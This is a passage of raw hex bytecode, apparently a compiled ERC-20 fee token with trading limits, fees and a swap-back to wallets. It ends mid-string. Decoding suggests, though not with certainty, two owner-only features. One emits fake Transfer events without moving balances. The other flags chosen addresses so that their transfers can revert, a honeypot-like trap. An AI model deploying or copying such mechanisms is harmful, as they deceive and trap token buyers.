00080fd5b506107fb60048036038101906107f69190613a89565b61177a565b005b34801561080957600080fd5b50610824600480360381019061081f9190613baa565b6117c6565b005b34801561083257600080fd5b5061083b6118fb565b005b34801561084957600080fd5b50610864600480360381019061085f9190613bfd565b61194d565b60405161087191906138d2565b60405180910390f35b34801561088657600080fd5b506108a1600480360381019061089c9190613a89565b6119d4565b6040516108b093929190613c3d565b60405180910390f35b3480156108c557600080fd5b506108ce611acd565b005b3480156108dc57600080fd5b506108e5611b1f565b6040516108f29190613b4f565b60405180910390f35b34801561090757600080fd5b50610922600480360381019061091d9190613a89565b611b45565b005b34801561093057600080fd5b50610939611bc8565b60405161094b96959493929190613c74565b60405180910390f35b34801561096057600080fd5b5061097b60048036038101906109769190613a89565b611bf7565b60405161098891906137b7565b60405180910390f35b34801561099d57600080fd5b506109a6611c4d565b6040516109b4929190613cd5565b60405180910390f35b3480156109c957600080fd5b506109e460048036038101906109df9190613b6a565b611c9e565b005b6060600380546109f590613d2d565b80601f0160208091040260200160405190810160405280929190818152602001828054610a2190613d2d565b8015610a6e5780601f10610a4357610100808354040283529160200191610a6e565b820191906000526020600020905b815481529060010190602001808311610a5157829003601f168201915b5050505050905090565b6000610a8c610a85611d4f565b8484611d57565b6001905092915050565b610a9e611f20565b60005b83839050811015610b3d5781601e6000868685818110610ac457610ac3613d5e565b5b9050602002016020810190610ad99190613a89565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610b3590613dbc565b915050610aa1565b50505050565b6000600254905090565b600b5481565b6000610b60848484611f9e565b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610bab611d4f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610c2b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c2290613e76565b60405180910390fd5b610c3f85610c37611d4f565b858403611d57565b60019150509392505050565b610c53611f20565b60005b83839050811015610d2257838382818110610c7457610c73613d5e565b5b9050602002016020810190610c899190613a89565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610d0791906138d2565b60405180910390a38080610d1a90613dbc565b915050610c56565b50505050565b610d30611f20565b6001601160036101000a81548160ff0219169083151502179055506000601160006101000a81548160ff021916908315150217905550427fb3da2db3dfc3778f99852546c6e9ab39ec253f9de7b0847afec61bd27878e92360405160405180910390a2565b600c5481565b601160029054906101000a900460ff1681565b60006009905090565b600080600080601160009054906101000a900460ff169350601160019054906101000a900460ff169250600e549150600f54905090919293565b6000610e93610dfe611d4f565b848460016000610e0c611d4f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e8e9190613e96565b611d57565b6001905092915050565b601160039054906101000a900460ff1681565b610eb8611f20565b6005811015610efc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef390613f3c565b60405180910390fd5b6103e8610f07610b43565b82610f129190613f5c565b610f1c9190613fcd565b600e819055507f12528a3c61e0f3b2d6fc707a9fc58b1af86e252cad0d7f4c154ebeabb162dace600e54604051610f5391906138d2565b60405180910390a150565b610f66611f20565b8160178190555080601881905550601854601754610f849190613e96565b60168190555060646016541115610fd0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fc790614070565b60405180910390fd5b7f38513c502b0ab4834ac1df9502b76f75dcf7092469782cfd0db7fe664388e25e60165460175460185460405161100993929190614090565b60405180910390a15050565b61101d611f20565b6002811015611061576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161105890614113565b60405180910390fd5b6103e861106c610b43565b826110779190613f5c565b6110819190613fcd565b600f819055507fff3dd5e80294197918c284bbfc3dadd97d0b40ce92106110946329088f80068a600f546040516110b891906138d2565b60405180910390a150565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b611113611f20565b61111d6000612c0a565b565b611127611f20565b61025883101561116c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611163906141a5565b60405180910390fd5b6103e8821115801561117f575060008210155b6111be576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111b590614237565b60405180910390fd5b82600c8190555081600b8190555080601160026101000a81548160ff021916908315150217905550505050565b6000806000600860159054906101000a900460ff1692506009549150600a549050909192565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606004805461124a90613d2d565b80601f016020809104026020016040519081016040528092919081815260200182805461127690613d2d565b80156112c35780601f10611298576101008083540402835291602001916112c3565b820191906000526020600020905b8154815290600101906020018083116112a657829003601f168201915b5050505050905090565b6112d5611f20565b601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fb91dbdeaf34f885ccae2d8abc3967cb03c079b6af2c7944e3893fd29427d75e760405160405180910390a380601260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b61139d611f20565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361142d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611424906142c9565b60405180910390fd5b6114378282612cd0565b5050565b611443611f20565b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7826040516114e091906137b7565b60405180910390a25050565b6114f4611f20565b81601481905550806015819055506015546014546115129190613e96565b6013819055506064601354111561155e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115559061435b565b60405180910390fd5b7fcb5f36df892836a2eaedc349de29a7581176990398ee185d16eaa8f6c1abd8f160135460145460155460405161159793929190614090565b60405180910390a15050565b600080600160006115b2611d4f565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561166f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611666906143ed565b60405180910390fd5b61168361167a611d4f565b85858403611d57565b600191505092915050565b600d5481565b60006116a86116a1611d4f565b8484611f9e565b6001905092915050565b6116ba611f20565b601160049054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8616c7a330e3cf61290821331585511f1e2778171e2b005fb5ec60cfe874dc6760405160405180910390a380601160046101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b611782611f20565b80600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6117ce611f20565b6001821015611812576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118099061447f565b60405180910390fd5b81811015611855576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161184c90614511565b60405180910390fd5b82600860156101000a81548160ff0219169083151502179055506127108261187b610b43565b6118859190613f5c565b61188f9190613fcd565b600981905550612710816118a1610b43565b6118ab9190613f5c565b6118b59190613fcd565b600a819055507f52cd2cdb42ff0eeec9362d7ed5b04f64c8d022697128b5378fc51cea7e63c7798383836040516118ee93929190613b09565b60405180910390a1505050565b611903611f20565b6000601160006101000a81548160ff021916908315150217905550427ff4eaa75eae08ae80c3daf791438dac1cff2cfd3b0bad2304ec7bbb067e50261660405160405180910390a2565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6000806000601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169250601c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169150601d60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1690509193909250565b611ad5611f20565b6000601160016101000a81548160ff021916908315150217905550427f26e776fcf7ca20aa79b5b946e9b5111f47205539ece9d7a7995271dd6a8b5bad60405160405180910390a2565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b611b4d611f20565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611bbc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bb3906145a3565b60405180910390fd5b611bc581612c0a565b50565b600080600080600080601654955060175494506018549350601354925060145491506015549050909192939495565b6000601e60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600080601160049054906101000a900473ffffffffffffffffffffffffffffffffffffffff16601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16915091509091565b611ca6611f20565b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f4b89c347592b1d537e066cb4ed98d87696ae35164745d7e370e4add16941dc9282604051611d4391906137b7565b60405180910390a25050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611dc6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dbd90614635565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611e35576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e2c906146c7565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051611f1391906138d2565b60405180910390a3505050565b611f28611d4f565b73ffffffffffffffffffffffffffffffffffffffff16611f46612d71565b73ffffffffffffffffffffffffffffffffffffffff1614611f9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f9390614733565b60405180910390fd5b565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361200d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612004906147c5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361207c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161207390614857565b60405180910390fd5b600081036120955761209083836000612d85565b612c05565b601160009054906101000a900460ff161561275a576120b2611211565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415801561212057506120f0611211565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b80156121595750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612193575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b80156121ac5750600860149054906101000a900460ff16155b1561275957601160039054906101000a900460ff166122a657601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806122665750601b60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b6122a5576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161229c906148e9565b60405180910390fd5b5b601160019054906101000a900460ff1615612470576122c3611211565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415801561234a57507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b80156123a45750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b1561246f5743601060003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541061242a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612421906149a1565b60405180910390fd5b43601060003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156125135750601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156125ba57600f5481111561255d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161255490614a33565b60405180910390fd5b600e54612569836110c3565b826125749190613e96565b11156125b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016125ac90614a9f565b60405180910390fd5b612758565b601d60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561265d5750601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156126ac57600f548111156126a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161269e90614b31565b60405180910390fd5b612757565b601c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661275657600e54612709836110c3565b826127149190613e96565b1115612755576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161274c90614a9f565b60405180910390fd5b5b5b5b5b5b6000612765306110c3565b90506000600954821015905080801561278a5750600860159054906101000a900460ff165b80156127a35750600860149054906101000a900460ff16155b80156127f95750601d60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b801561284f5750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156128a55750601b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156128e9576001600860146101000a81548160ff0219169083151502179055506128cd613004565b6000600860146101000a81548160ff0219169083151502179055505b6000600860149054906101000a900460ff16159050601b60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061299f5750601b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156129a957600090505b60008115612bbc57601d60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612a0c57506000601354115b15612aa657612a396064612a2b601354886131c290919063ffffffff16565b6131d890919063ffffffff16565b905060135460155482612a4c9190613f5c565b612a569190613fcd565b601a6000828254612a679190613e96565b9250508190555060135460145482612a7f9190613f5c565b612a899190613fcd565b60196000828254612a9a9190613e96565b92505081905550612b98565b601d60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168015612b0157506000601654115b15612b9757612b2e6064612b20601654886131c290919063ffffffff16565b6131d890919063ffffffff16565b905060165460185482612b419190613f5c565b612b4b9190613fcd565b601a6000828254612b5c9190613e96565b9250508190555060165460175482612b749190613f5c565b612b7e9190613fcd565b60196000828254612b8f9190613e96565b925050819055505b5b6000811115612bad57612bac873083612d85565b5b8085612bb99190614b51565b94505b600860149054906101000a900460ff16158015612be55750601160029054906101000a900460ff165b15612bf557612bf3876131ee565b505b612c00878787612d85565b505050505b505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b600080612d7c6132f1565b90508091505090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612df4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612deb906147c5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612e63576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612e5a90614857565b60405180910390fd5b612e6e838383613399565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015612ef4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612eeb90614bf7565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254612f879190613e96565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051612feb91906138d2565b60405180910390a3612ffe84848461339e565b50505050565b600061300f306110c3565b905060008190506000808303613027575050506131c0565b600a5483111561303757600a5492505b6000839050600047905061304a826133a3565b600061305f82476135e090919063ffffffff16565b9050600061308a8661307c601a54856131c290919063ffffffff16565b6131d890919063ffffffff16565b905060006019819055506000601a81905550601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16816040516130e290614c48565b60006040518083038185875af1925050503d806000811461311f576040519150601f19603f3d011682016040523d82523d6000602084013e613124565b606091505b505080955050601160049054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff164760405161317090614c48565b60006040518083038185875af1925050503d80600081146131ad576040519150601f19603f3d011682016040523d82523d6000602084013e6131b2565b606091505b505080955050505050505050505b565b600081836131d09190613f5c565b905092915050565b600081836131e69190613fcd565b905092915050565b6000803073ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b815260040161322a9190613b4f565b602060405180830381865afa158015613247573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061326b9190614c72565b90506000613284600b54836135f690919063ffffffff16565b9050601e60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156132e657600081146132e557600080fd5b5b600192505050919050565b60008073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461337057600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16613394565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff165b905090565b505050565b505050565b6000600267ffffffffffffffff8111156133c0576133bf614c9f565b5b6040519080825280602002602001820160405280156133ee5781602001602082028036833780820191505090505b509050308160008151811061340657613405613d5e565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156134ab573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906134cf9190614ce3565b816001815181106134e3576134e2613d5e565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050613548307f000000000000000000000000000000000000000000000000000000000000000084611d57565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b81526004016135aa959493929190614e13565b600060405180830381600087803b1580156135c457600080fd5b505af11580156135d8573d6000803e3d6000fd5b505050505050565b600081836135ee9190614b51565b905092915050565b600081836136049190613e96565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561364657808201518184015260208101905061362b565b60008484015250505050565b6000601f19601f8301169050919050565b600061366e8261360c565b6136788185613617565b9350613688818560208601613628565b61369181613652565b840191505092915050565b600060208201905081810360008301526136b68184613663565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006136f3826136c8565b9050919050565b613703816136e8565b811461370e57600080fd5b50565b600081359050613720816136fa565b92915050565b6000819050919050565b61373981613726565b811461374457600080fd5b50565b60008135905061375681613730565b92915050565b60008060408385031215613773576137726136be565b5b600061378185828601613711565b925050602061379285828601613747565b9150509250929050565b60008115159050919050565b6137b18161379c565b82525050565b60006020820190506137cc60008301846137a8565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126137f7576137f66137d2565b5b8235905067ffffffffffffffff811115613814576138136137d7565b5b6020830191508360208202830111156138305761382f6137dc565b5b9250929050565b6138408161379c565b811461384b57600080fd5b50565b60008135905061385d81613837565b92915050565b60008060006040848603121561387c5761387b6136be565b5b600084013567ffffffffffffffff81111561389a576138996136c3565b5b6138a6868287016137e1565b935093505060206138b98682870161384e565b9150509250925092565b6138cc81613726565b82525050565b60006020820190506138e760008301846138c3565b92915050565b600080600060608486031215613906576139056136be565b5b600061391486828701613711565b935050602061392586828701613711565b925050604061393686828701613747565b9150509250925092565b600080600060408486031215613959576139586136be565b5b600084013567ffffffffffffffff811115613977576139766136c3565b5b613983868287016137e1565b9350935050602061399686828701613747565b9150509250925092565b600060ff82169050919050565b6139b6816139a0565b82525050565b60006020820190506139d160008301846139ad565b92915050565b60006080820190506139ec60008301876137a8565b6139f960208301866137a8565b613a0660408301856138c3565b613a1360608301846138c3565b95945050505050565b600060208284031215613a3257613a316136be565b5b6000613a4084828501613747565b91505092915050565b60008060408385031215613a6057613a5f6136be565b5b6000613a6e85828601613747565b9250506020613a7f85828601613747565b9150509250929050565b600060208284031215613a9f57613a9e6136be565b5b6000613aad84828501613711565b91505092915050565b600080600060608486031215613acf57613ace6136be565b5b6000613add86828701613747565b9350506020613aee86828701613747565b9250506040613aff8682870161384e565b9150509250925092565b6000606082019050613b1e60008301866137a8565b613b2b60208301856138c3565b613b3860408301846138c3565b949350505050565b613b49816136e8565b82525050565b6000602082019050613b646000830184613b40565b92915050565b60008060408385031215613b8157613b806136be565b5b6000613b8f85828601613711565b9250506020613ba08582860161384e565b9150509250929050565b600080600060608486031215613bc357613bc26136be565b5b6000613bd18682870161384e565b9350506020613be286828701613747565b9250506040613bf386828701613747565b9150509250925092565b60008060408385031215613c1457613c136136be565b5b6000613c2285828601613711565b9250506020613c3385828601613711565b9150509250929050565b6000606082019050613c5260008301866137a8565b613c5f60208301856137a8565b613c6c60408301846137a8565b949350505050565b600060c082019050613c8960008301896138c3565b613c9660208301886138c3565b613ca360408301876138c3565b613cb060608301866138c3565b613cbd60808301856138c3565b613cca60a08301846138c3565b979650505050505050565b6000604082019050613cea6000830185613b40565b613cf76020830184613b40565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680613d4557607f821691505b602082108103613d5857613d57613cfe565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000613dc782613726565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203613df957613df8613d8d565b5b600182019050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b6000613e60602883613617565b9150613e6b82613e04565b604082019050919050565b60006020820190508181036000830152613e8f81613e53565b9050919050565b6000613ea182613726565b9150613eac83613726565b9250828201905080821115613ec457613ec3613d8d565b5b92915050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b6000613f26602483613617565b9150613f3182613eca565b604082019050919050565b60006020820190508181036000830152613f5581613f19565b9050919050565b6000613f6782613726565b9150613f7283613726565b9250828202613f8081613726565b91508282048414831517613f9757613f96613d8d565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000613fd882613726565b9150613fe383613726565b925082613ff357613ff2613f9e565b5b828204905092915050565b7f546f74616c20627579206665652063616e6e6f7420626520686967686572207460008201527f68616e2031303025000000000000000000000000000000000000000000000000602082015250565b600061405a602883613617565b915061406582613ffe565b604082019050919050565b600060208201905081810360008301526140898161404d565b9050919050565b60006060820190506140a560008301866138c3565b6140b260208301856138c3565b6140bf60408301846138c3565b949350505050565b7f43616e6e6f7420736574206d61785478206c6f776572207468616e20302e3225600082015250565b60006140fd602083613617565b9150614108826140c7565b602082019050919050565b6000602082019050818103600083015261412c816140f0565b9050919050565b7f63616e6e6f7420736574206275796261636b206d6f7265206f6674656e20746860008201527f616e206576657279203130206d696e7574657300000000000000000000000000602082015250565b600061418f603383613617565b915061419a82614133565b604082019050919050565b600060208201905081810360008301526141be81614182565b9050919050565b7f4d75737420736574206175746f204c50206275726e2070657263656e7420626560008201527f747765656e20302520616e642031302500000000000000000000000000000000602082015250565b6000614221603083613617565b915061422c826141c5565b604082019050919050565b6000602082019050818103600083015261425081614214565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b60006142b3603983613617565b91506142be82614257565b604082019050919050565b600060208201905081810360008301526142e2816142a6565b9050919050565b7f546f74616c2073656c6c206665652063616e6e6f74206265206869676865722060008201527f7468616e20313030250000000000000000000000000000000000000000000000602082015250565b6000614345602983613617565b9150614350826142e9565b604082019050919050565b6000602082019050818103600083015261437481614338565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006143d7602583613617565b91506143e28261437b565b604082019050919050565b60006020820190508181036000830152614406816143ca565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60008201527f20302e30312520746f74616c20737570706c792e000000000000000000000000602082015250565b6000614469603483613617565b91506144748261440d565b604082019050919050565b600060208201905081810360008301526144988161445c565b9050919050565b7f6d6178696d756d20616d6f756e742063616e742062652068696768657220746860008201527f616e206d696e696d756d00000000000000000000000000000000000000000000602082015250565b60006144fb602a83613617565b91506145068261449f565b604082019050919050565b6000602082019050818103600083015261452a816144ee565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061458d602683613617565b915061459882614531565b604082019050919050565b600060208201905081810360008301526145bc81614580565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061461f602483613617565b915061462a826145c3565b604082019050919050565b6000602082019050818103600083015261464e81614612565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006146b1602283613617565b91506146bc82614655565b604082019050919050565b600060208201905081810360008301526146e0816146a4565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061471d602083613617565b9150614728826146e7565b602082019050919050565b6000602082019050818103600083015261474c81614710565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006147af602583613617565b91506147ba82614753565b604082019050919050565b600060208201905081810360008301526147de816147a2565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000614841602383613617565b915061484c826147e5565b604082019050919050565b6000602082019050818103600083015261487081614834565b9050919050565b7f5f7472616e736665723a3a2054726164696e67206973206e6f7420616374697660008201527f652e000000000000000000000000000000000000000000000000000000000000602082015250565b60006148d3602283613617565b91506148de82614877565b604082019050919050565b60006020820190508181036000830152614902816148c6565b9050919050565b7f5f7472616e736665723a3a205472616e736665722044656c617920656e61626c60008201527f65642e20204f6e6c79206f6e652070757263686173652070657220626c6f636b60208201527f20616c6c6f7765642e0000000000000000000000000000000